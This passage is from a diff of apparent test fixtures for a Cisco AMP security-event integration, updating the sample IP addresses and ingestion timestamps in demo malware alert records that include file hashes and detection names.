Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898086900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1248,7 +1158,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1294,7 +1204,7 @@ "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1304,8 +1214,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070151856Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", + "ingested": "2021-12-09T13:35:32.898092700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296258", "kind": "alert", "start": "2021-01-15T10:24:58.000Z", @@ -1327,7 +1237,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1380,7 +1290,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1397,8 +1307,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070153909Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898098500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1420,7 +1330,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1470,7 +1380,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1483,8 +1393,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070155934Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898104400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1506,7 +1416,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1556,7 +1466,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1569,8 +1479,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070157953Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898110200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1592,7 +1502,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1640,7 +1550,7 @@ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1650,8 +1560,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070160132Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", + "ingested": "2021-12-09T13:35:32.898116100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-15T10:22:29.000Z", @@ -1674,7 +1584,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1727,7 +1637,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1744,8 +1654,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070162179Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898122Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1767,7 +1677,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1817,7 +1727,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1830,8 +1740,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070164200Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898127900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat 